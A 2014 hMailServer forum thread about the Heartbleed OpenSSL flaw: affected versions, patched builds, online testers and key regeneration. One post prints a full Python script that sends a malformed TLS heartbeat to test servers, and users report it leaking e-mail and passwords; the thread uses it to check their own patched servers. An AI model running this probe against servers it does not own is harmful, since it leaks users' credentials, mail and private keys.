Heartbleed Bug in OpenSSL
Hi,
is hMailServer in any way affected by the Heartbleed Bug in OpenSSL?
(http://heartbleed.com/)
This is a VERY serious problem
Best regards,
B
Re: Heartbleed Bug in OpenSSL
Yes, hMailServer is vulnerable. Even worse, OpenSSL is statically linked, so there is no way for the end user to patch this until an official update is released.
I recommend you to take your server offline until this issue is addressed. I just ran a testing script against one of my servers, and it happily replied with private e-mails and passwords.
Re: Heartbleed Bug in OpenSSL
Oooh boy....
Re: Heartbleed Bug in OpenSSL
I will look into this and release a patch.
Re: Heartbleed Bug in OpenSSL
Reading the full information release and the link to openssl.org news release it seems there is an easy fix.
Just use one of the earlier releases of openssl or the fix release (OpenSSL 1.0.1g) to regenerate your certificates.
What versions of the OpenSSL are affected?
Status of different versions:
• OpenSSL 1.0.1 through 1.0.1f (inclusive) are vulnerable
• OpenSSL 1.0.1g is NOT vulnerable
• OpenSSL 1.0.0 branch is NOT vulnerable
• OpenSSL 0.9.8 branch is NOT vulnerable
Bug was introduced to OpenSSL in December 2011 and has been out in the wild since OpenSSL release 1.0.1 on 14th of March 2012. OpenSSL 1.0.1g released on 7th of April 2014 fixes the bug.
Re: Heartbleed Bug in OpenSSL
Hi,
Is there any way I can tell what version of OpenSSL my installation is using?
Cheers
Re: Heartbleed Bug in OpenSSL
percepts wrote:
> Just use one of the earlier releases of openssl or the fix release(OpenSSL 1.0.1g) to regenerate your certificates.
Unfortunately, this issue is not about certificates. It is an issue in the implementation of the TLS protocol. Long story short, it is currently possible for anyone, without authentication, to grab the passwords of any recently logged on users, their recently sent e-mails, or your cryptographic keys, over the internet and without leaving a trace. The only solution for this issue is to update hMailServer once a patch is out.
@martin: I am looking forward to the update.
SCOOBY wrote:
> Is there anyway I can tell what version of Open SSL my installation is using?
hMailServer 5.4 is using OpenSSL 1.0.1c.
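The version question above can also be answered from the installed binary itself: OpenSSL compiles a version banner into the library, and that string survives static linking. The following is an added example, not code from the thread or from hMailServer; the function names and the sample bytes are constructed for illustration, and the status rules are the ones quoted from heartbleed.com earlier in the thread.

```python
import re

# OpenSSL embeds a banner such as "OpenSSL 1.0.1c 10 May 2012" in its code,
# so it is present in any executable the library was statically linked into.
VERSION_RE = re.compile(rb"OpenSSL (\d+)\.(\d+)\.(\d+)([a-z]*)")


def classify(major, minor, fix, letter):
    """Map a version to the status list quoted earlier in this thread."""
    branch = (major, minor, fix)
    if branch == (1, 0, 1):
        # 1.0.1 through 1.0.1f are vulnerable; 1.0.1g carries the fix.
        return "vulnerable" if letter < "g" else "not vulnerable"
    if branch in ((1, 0, 0), (0, 9, 8)):
        return "not vulnerable"
    return "unknown"  # branch not covered by the list in the thread


def embedded_openssl_versions(blob):
    """Return {version: status} for every OpenSSL banner found in blob."""
    found = {}
    for m in VERSION_RE.finditer(blob):
        major, minor, fix = (int(g) for g in m.groups()[:3])
        letter = m.group(4).decode("ascii")
        version = "%d.%d.%d%s" % (major, minor, fix, letter)
        found[version] = classify(major, minor, fix, letter)
    return found


def scan_file(path):
    """Scan an executable or DLL on disk (read whole; these files are small)."""
    with open(path, "rb") as fh:
        return embedded_openssl_versions(fh.read())


# Constructed sample standing in for bytes read from two different binaries.
SAMPLE = (b"MZ\x90\x00" + b"OpenSSL 1.0.1c 10 May 2012\x00"
          + b"\x8b\xff\x55" + b"OpenSSL 0.9.8o 01 Jun 2010\x00")

if __name__ == "__main__":
    for version, status in sorted(embedded_openssl_versions(SAMPLE).items()):
        print("OpenSSL %s: %s" % (version, status))
```

A result of "unknown" means the branch is not in the list quoted in the thread and has to be checked against the OpenSSL advisory instead.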
Re: Heartbleed Bug in OpenSSL
I sent a security newsletter a while back informing users about this issue.
Personally I've disabled the SSL TCP/IP-ports until patched, so I am still able to receive email using SMTP on port 25. Of course this won't work for everyone.
Re: Heartbleed Bug in OpenSSL
Thanks, eagerly awaiting the update!
Also, if a server does not have an SSL certificate installed, and only non-ssl ports are open, is it still vulnerable?
Re: Heartbleed Bug in OpenSSL
If you don't have TCP/IP ports, then OpenSSL isn't executed within hMailServer so then it should not be vulnerable.
Re: Heartbleed Bug in OpenSSL
From what version does hMail use OpenSSL 1.0.1?
Re: Heartbleed Bug in OpenSSL
2014-04-08 5.4-B2014040801
* IMPORTANT: This build has a LOT of extra debug logging but NOT shown by default. [Settings]LogLevel=10 for some extra to 100 for extremely verbose
* URGENT: Heartbleed zero day openSSL fix http://www.zdnet.com/heartbleed-serious ... 000028166/
* Updated hmailserver to openssl-1.0.1g
* ONLY MINIMALLY TESTED. VULNERABILITY ERADICATION UNTESTED. Just built openssl-1.01.1g & incorporated into this build.
http://www.hmailserver.com/forum/viewto ... 10&t=21420
EDIT:
Also posted non-static linked build so openssl dll's can be used if needed. Obviously weird things can happen if you use incompatible DLL's so know what you are doing & only use if needed.
hMailServer build LIVE on my servers: 5.4-B2014050402
#hmailserver on FreeNode IRC https://webchat.freenode.net/?channels=#hmailserver
*** ABSENT FROM hMail! Those in IRC know how to find me if urgent. ***
Re: Heartbleed Bug in OpenSSL
Sorry if I'm being dense, but where do I download it from?
Re: Heartbleed Bug in OpenSSL
Thanks Bill48105, I can confirm that this update resolves the issue.
Re: Heartbleed Bug in OpenSSL
SCOOBY wrote:
> Sorry if I'm being dense, but where do I download it from?
You go to the experimental thread:
http://www.hmailserver.com/forum/viewto ... 10&t=21420
Scroll WAYYY down to where the downloads are:
Code: Select all
NEWEST & MOST RECENT:
=== 8Apr2014 === (BASED on official 5.4 B1950 + to-date experimental changes)
* URGENT: Heartbleed zero day openSSL fix http://www.zdnet.com/heartbleed-serious ... 000028166/
* IMPORTANT: This build has a LOT of extra debug logging but NOT shown by default. [Settings]LogLevel=10 for some extra to 100 for extremely verbose
NOTE: Should be stable but not recommended live on production until tested further
Re: Heartbleed Bug in OpenSSL
mlg.odk wrote:
> Thanks Bill48105, I can confirm that this update resolves the issue.
Ok great! How did you test it?
Thx
Bill
Re: Heartbleed Bug in OpenSSL
Bill48105 wrote:
> mlg.odk wrote:
> > Thanks Bill48105, I can confirm that this update resolves the issue.
> Ok great! How did you test it?
> Thx
> Bill
There is an online testing tool available here: http://filippo.io/Heartbleed/ (specify some port used by hMailServer as it defaults to 443).
Re: Heartbleed Bug in OpenSSL
mlg.odk wrote:
> Bill48105 wrote:
> > mlg.odk wrote:
> > > Thanks Bill48105, I can confirm that this update resolves the issue.
> > Ok great! How did you test it?
> > Thx
> > Bill
> There is an online testing tool available here: http://filippo.io/Heartbleed/ (specify some port used by hMailServer as it defaults to 443).
OK cool thx. Yup it claims it's ok now. Assuming it is true it's good then eh.
Re: Heartbleed Bug in OpenSSL
Well....
I've just tested my un-patched hMailServer on that URL and it's saying it is fine...
I'm running 5.3.3-B1879 at the moment.
Any ideas?
Re: Heartbleed Bug in OpenSSL
Same thing here. Either the issue is not deterministic, or the test at http://filippo.io/Heartbleed is broken.
Currently compiling the new version.
Re: Heartbleed Bug in OpenSSL
martin wrote:
> Same thing here. Either the issue is not deterministic, or the test at http://filippo.io/Heartbleed is broken.
> Currently compiling the new version.
SCOOBY wrote:
> Well....
> I've just tested my un-patched hMailServer on that URL and it's saying it is fine...
> I'm running 5.3.3-B1879 at the moment.
> Any ideas?
Luc from IRC tested before & after with the python script & claims it reported vulnerable before & OK after.
If anyone else wants to test:
https://gist.github.com/sh1n0b1/10100394
Re: Heartbleed Bug in OpenSSL
heartbleedtest.py
usage:
heartbleedtest.py domainname -p 993
heartbleedtest.py domainname -p 995
heartbleedtest.py domainname -p 465
Code: Select all
#!/usr/bin/python
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.
# Modified for simplified checking by Yonathan Klijnsma
# Written for Python 2 (print statements, str.decode('hex')).
import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser

target = None
options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')

def h2bin(x):
    # Convert a whitespace-separated hex dump into a raw byte string.
    return x.replace(' ', '').replace('\n', '').decode('hex')

# TLS ClientHello record.
hello = h2bin('''
16 03 02 00 dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
''')

# Heartbeat record: 3-byte body that declares a 0x4000-byte payload.
hb = h2bin('''
18 03 02 00 03
01 40 00
''')

def hexdump(s):
    for b in xrange(0, len(s), 16):
        lin = [c for c in s[b : b + 16]]
        hxdat = ' '.join('%02X' % ord(c) for c in lin)
        pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
        print ' %04x: %-48s %s' % (b, hxdat, pdat)
    print

def recvall(s, length, timeout=5):
    # Read exactly `length` bytes, or return None on timeout or EOF.
    endtime = time.time() + timeout
    rdata = ''
    remain = length
    while remain > 0:
        rtime = endtime - time.time()
        if rtime < 0:
            return None
        r, w, e = select.select([s], [], [], 5)
        if s in r:
            data = s.recv(remain)
            # EOF?
            if not data:
                return None
            rdata += data
            remain -= len(data)
    return rdata

def recvmsg(s):
    # Read one TLS record: 5-byte header (type, version, length), then the body.
    hdr = recvall(s, 5)
    if hdr is None:
        return None, None, None
    typ, ver, ln = struct.unpack('>BHH', hdr)
    pay = recvall(s, ln, 10)
    if pay is None:
        return None, None, None
    return typ, ver, pay

def hit_hb(s):
    global target
    s.send(hb)
    while True:
        typ, ver, pay = recvmsg(s)
        if typ is None:
            print target + '|NOT VULNERABLE'
            return False
        # Record type 24 = heartbeat response.
        if typ == 24:
            if len(pay) > 3:
                print target + '|VULNERABLE'
            else:
                print target + '|NOT VULNERABLE'
            return True
        # Record type 21 = alert.
        if typ == 21:
            print target + '|NOT VULNERABLE'
            return False

def main():
    global target
    opts, args = options.parse_args()
    if len(args) < 1:
        options.print_help()
        return
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sys.stdout.flush()
    s.connect((args[0], opts.port))
    target = args[0]
    sys.stdout.flush()
    s.send(hello)
    sys.stdout.flush()
    while True:
        typ, ver, pay = recvmsg(s)
        if typ == None:
            return
        # Look for server hello done message.
        if typ == 22 and ord(pay[0]) == 0x0E:
            break
    sys.stdout.flush()
    s.send(hb)
    hit_hb(s)

if __name__ == '__main__':
    main()
CIDR to RegEx: d-fault.nl/cidrtoregex
DNS Lookup: d-fault.nl/dnstools
DKIM Generator: d-fault.nl/dkimgenerator
DNSBL Lookup: d-fault.nl/dnsbllookup
GEOIP Lookup: d-fault.nl/geoiplookup
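The `hb` record in the script above declares a 0x4000-byte heartbeat payload inside a 3-byte record; the check below is the length validation RFC 6520 requires of a receiver, written as an added example (not part of the post and not OpenSSL's code). It assumes plaintext records, such as a heartbeat sent before the handshake completes as the script does; the function names and the second and third sample records are constructed.

```python
import struct

HEARTBEAT = 24     # TLS record content type for heartbeat (RFC 6520)
MIN_PADDING = 16   # RFC 6520 requires at least 16 bytes of padding


def iter_records(stream):
    """Yield (content_type, fragment) for each complete TLS record in stream."""
    offset = 0
    while offset + 5 <= len(stream):
        ctype, _version, length = struct.unpack_from(">BHH", stream, offset)
        fragment = stream[offset + 5:offset + 5 + length]
        if len(fragment) < length:
            return  # truncated capture, nothing more to parse
        yield ctype, fragment
        offset += 5 + length


def check_heartbeat(fragment):
    """Return (verdict, claimed_len, received_len) for one plaintext heartbeat."""
    received = len(fragment)
    if received < 3:
        return ("malformed", None, received)
    hb_type, claimed = struct.unpack_from(">BH", fragment)
    if hb_type not in (1, 2):  # 1 = request, 2 = response
        return ("malformed", claimed, received)
    # Type (1) + length (2) + payload + padding must fit inside the record.
    # A receiver that skips this test copies `claimed` bytes regardless of
    # how many bytes actually arrived.
    if 1 + 2 + claimed + MIN_PADDING > received:
        return ("length-mismatch", claimed, received)
    return ("ok", claimed, received)


def scan(stream):
    """Check every heartbeat record in a byte stream of plaintext TLS records."""
    return [check_heartbeat(frag)
            for ctype, frag in iter_records(stream)
            if ctype == HEARTBEAT]


# The heartbeat record from the script above: claims 0x4000 bytes, carries none.
PAGE_HB = bytes.fromhex("18 03 02 00 03 01 40 00")
# Constructed well-formed request: 4-byte payload "ping" plus 16 padding bytes.
GOOD_HB = bytes.fromhex("18 03 02 00 17 01 00 04") + b"ping" + bytes(16)
# Constructed alert record (type 21), which the scan must skip.
ALERT = bytes.fromhex("15 03 02 00 02 02 28")

if __name__ == "__main__":
    for verdict, claimed, received in scan(PAGE_HB + ALERT + GOOD_HB):
        print(verdict, "claimed:", claimed, "received:", received)
```

Heartbeats sent after the handshake are encrypted, so this check applies at the TLS endpoint or to pre-handshake traffic, not to a passive tap on established sessions.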
Re: Heartbleed Bug in OpenSSL
http://filippo.io/Heartbleed also says my hMailserver installation B1950 is clean.
Re: Heartbleed Bug in OpenSSL
sowen wrote:
> http://filippo.io/Heartbleed also says my hMailserver installation B1950 is clean.
That's not looking good in terms of trusting that test.. Did you try the python script?
Re: Heartbleed Bug in OpenSSL
I'd say the filippo.io bug is faulty then:
- I've tried the python script (not the one posted above, but another one) before patching, which said 5.4-B1950 is vulnerable;
- I've tried that same python script after patching which said 5.4-B2014040801 is *not* vulnerable; and
- I've tried filippo.io after patching which said I was *not* vulnerable.
So I'm not sure whether filippo.io works properly, but B1950 definitely was vulnerable for me. In the python script I saw some of my own e-mail. Filippo.io does seem to work on checking whether apache is vulnerable though, those results usually match python's.
Last edited by lucb1e on 2014-04-08 21:01, edited 1 time in total.
Re: Heartbleed Bug in OpenSSL
lucb1e wrote:
> I'd say the filippo.io bug is faulty then:
> - I've tried the python script (not the one posted above, but another one) before patching, which said 5.4-B1950 is vulnerable;
> - I've tried that same python script after patching which said 5.4-B2014040801 is *not* vulnerable; and
> - I've tried filippo.io after patching which said I was *not* vulnerable.
> So I'm not sure whether filippo.io works properly, but B1950 definitely was vulnerable for me. In the python script I saw some of my own e-mail. Filippo.io does seem to work on checking whether apache is vulnerable though, those results usually match python's.
Thanks for the info. I'd sooner say not to trust that site at this point. Maybe a bug, maybe not designed to test mail or maybe they are a front to gather info about vulnerable servers.
Re: Heartbleed Bug in OpenSSL
There's a build available here now:
http://download.hmailserver.com/hMailSe ... -B1951.exe
I'm running it myself and it passes the heartbleed tests.
Re: Heartbleed Bug in OpenSSL
martin wrote:
> There's a build available here now:
> http://download.hmailserver.com/hMailSe ... -B1951.exe
> I'm running it myself and it passes the heartbleed tests.
Cool thx martin.
NOTE: That build does not contain starttls or other post B1950 changes I've put in my experimental builds though. So anyone who was on B1950 can upgrade to B1951 but anyone who needs starttls or other changes I've made should use my experimental build from today.
Re: Heartbleed Bug in OpenSSL
Great Job!
Thanks a lot for the fast response!
Best regards,
B
Re: Heartbleed Bug in OpenSSL
Thanks guys, server patched and hopefully that is that!!
Re: Heartbleed Bug in OpenSSL
Bill48105 wrote:
> martin wrote:
> > There's a build available here now:
> > http://download.hmailserver.com/hMailSe ... -B1951.exe
> > I'm running it myself and it passes the heartbleed tests.
> Cool thx martin.
> NOTE: That build does not contain starttls or other post B1950 changes I've put in my experimental builds though. So anyone who was on B1950 can upgrade to B1951 but anyone who needs starttls or other changes I've made should use my experimental build from today.
I don't need StartTLS (but am happy to test it)
I do need the OTHER fixes that you have incorporated into your ALPHA builds...Like the UTF-8 Indexing, the IOCP fixes etc
Where is this stuff at in terms of the new build?
Just 'cause I link to a page and say little else doesn't mean I am not being nice.
https://www.hmailserver.com/documentation
Re: Heartbleed Bug in OpenSSL
mattg wrote:
> Bill48105 wrote:
> > martin wrote:
> > > There's a build available here now:
> > > http://download.hmailserver.com/hMailSe ... -B1951.exe
> > > I'm running it myself and it passes the heartbleed tests.
> > Cool thx martin.
> > NOTE: That build does not contain starttls or other post B1950 changes I've put in my experimental builds though. So anyone who was on B1950 can upgrade to B1951 but anyone who needs starttls or other changes I've made should use my experimental build from today.
> I don't need StartTLS (but am happy to test it)
> I do need the OTHER fixes that you have incorporated into your ALPHA builds...Like the UTF-8 Indexing, the IOCP fixes etc
> Where is this stuff at in terms of the new build?
martin is moving away from SVN repo in favor of github. He had setup a 'dev' one there awhile back but I stuck on the svn until I was able to get my local copy cleaned up enough to commit. I've just not had time. Now martin is setting up a new copy on github and setting up automated builds. Should help keep them in sync.
So long story short only my builds have a lot of the recent 'experimental' changes until I can get them to martin so he can approve & merge with his but no ETA
Bill
Re: Heartbleed Bug in OpenSSL
Doesn't 5.3.3 build 1879 use a previous version of OpenSSL, that isn't affected by the bug?
As far as I can see the bug was introduced in OpenSSL 1.0.1 that was released in December 2011, while hMS build 1879 was released in June 2010 (=before the bug).
Re: Heartbleed Bug in OpenSSL
martin wrote:
> There's a build available here now:
> http://download.hmailserver.com/hMailSe ... -B1951.exe
> I'm running it myself and it passes the heartbleed tests.
Martin,
I want to thank you (and of course everyone who contributed!) for your quick reaction.
This is a level of service I would expect from a company, but not from a small project (most companies would most likely not react as fast as you did!).
The last 24 hours weren't the brightest in the history of the internet, but hmailserver and many other opensource projects have done a great job in mitigating the most severe incident I can remember in the past 7 years. It was the sysadmin's nightmare come true, every SSL-Port an enemy.
It's time to get some sleep, now that the Heartbleeding has stopped...
Thanks a Million and keep up the great work!
Best Regards,
Jan
Re: Heartbleed Bug in OpenSSL
For what it's worth, I found out that the on-line testing at
http://possible.lv/tools/hb/
provides more informative results than the test at filippo.io
Re: Heartbleed Bug in OpenSSL
That testing method is only good for testing it on HTTPS sites, if you want to use anything else you will probably need a different checking tool, and I have yet to find one that works correctly with IMAP, POP and SMTP.
Simple: if you have used SSL with your server, update now to the latest stable or experimental build (whichever it is that you need, because of specific options). After you have done that, create a new certificate, since the private key could have been compromised.
Steps to create a new certificate can be found here: http://www.hmailserver.com/forum/viewto ... 12&t=22371
When creating a new certificate make sure you use a new private key!
If you have strange problems or errors use the log analyzer! http://log.damnation.org.uk
Join us on IRC! http://hmailserver.com/irc_fullscreen.php
Re: Heartbleed Bug in OpenSSL
Caspar wrote:
> That testing method is only good for testing it on HTTPS sites, if you want to use anything else you will probably need a different checking tool, and I have yet to find one that works correctly with IMAP, POP and SMTP.
> Simple: if you have used SSL with your server Update now to the latest stable or experimental build (whatever is that you need, because of specific options). After you have done that create a new certificate since the Private key could have been compromised.
> Steps on to do a new certificate you can find here: http://www.hmailserver.com/forum/viewto ... 12&t=22371
> When creating a new certificate make sure you use a new private key!
The python scripts above work. I tested them with hmail.
Re: Heartbleed Bug in OpenSSL
Bill48105 wrote:
> Caspar wrote:
> > ...
> The python scripts above work. I tested them with hmail.
It only works if it is using SSL all the time. If it does not use SSL all the time (like if you want to use STARTTLS) it does not work.
Re: Heartbleed Bug in OpenSSL
Caspar wrote:
> Bill48105 wrote:
> > Caspar wrote:
> > > ...
> > The python scripts above work. I tested them with hmail.
> It only works if it is using SSL all the time. If it does not use SSL all the time (like if you want to use STARTTLS) it does not work.
Yeah I hadn't tested it on a non SSL port but guess that makes sense since handshake hasn't completed yet on STARTTLS enabled port although it is an SSL socket even before the handshake. But if one wants to test just test SSL & if it's OK STARTTLS ports would be too unless someone proves otherwise.
Bill
Re: Heartbleed Bug in OpenSSL
Sune wrote:
> Doesn't 5.3.3 build 1879 use a previous version of OpenSSL, that isn't affected by the bug?
> As far as I can see the bug was introduced in OpenSSL 1.0.1 that was released in December 2011, while hMS build 1879 was released in June 2010 (=before the bug).
I would also like a definitive answer to this.
Re: Heartbleed Bug in OpenSSL
Version 5.3.3 - Build 1879 (2010-06-06) - Production
Issue 312: In some cases, the POP3 server returned incorrect data which could lead to corrupt attachments. Changes have been made to prevent this error. The error was apparent when retrieving PDF files which had been sent using Outlook Express.
Issue 313: If hMailServer was configured to download messages from a server which did not support UIDL, hMailServer timed out. hMailServer has been changed to disconnect immediately and report an error when this happens. The External account functionality in hMailServer does not work with POP3 servers not supporting UIDL.
Issue 314: If DKIM was enabled and a user sent an email with no text in the body, hMailServer did not correctly sign the message.
Issue 1879: OpenSSL has been upgraded to version 0.9.8o.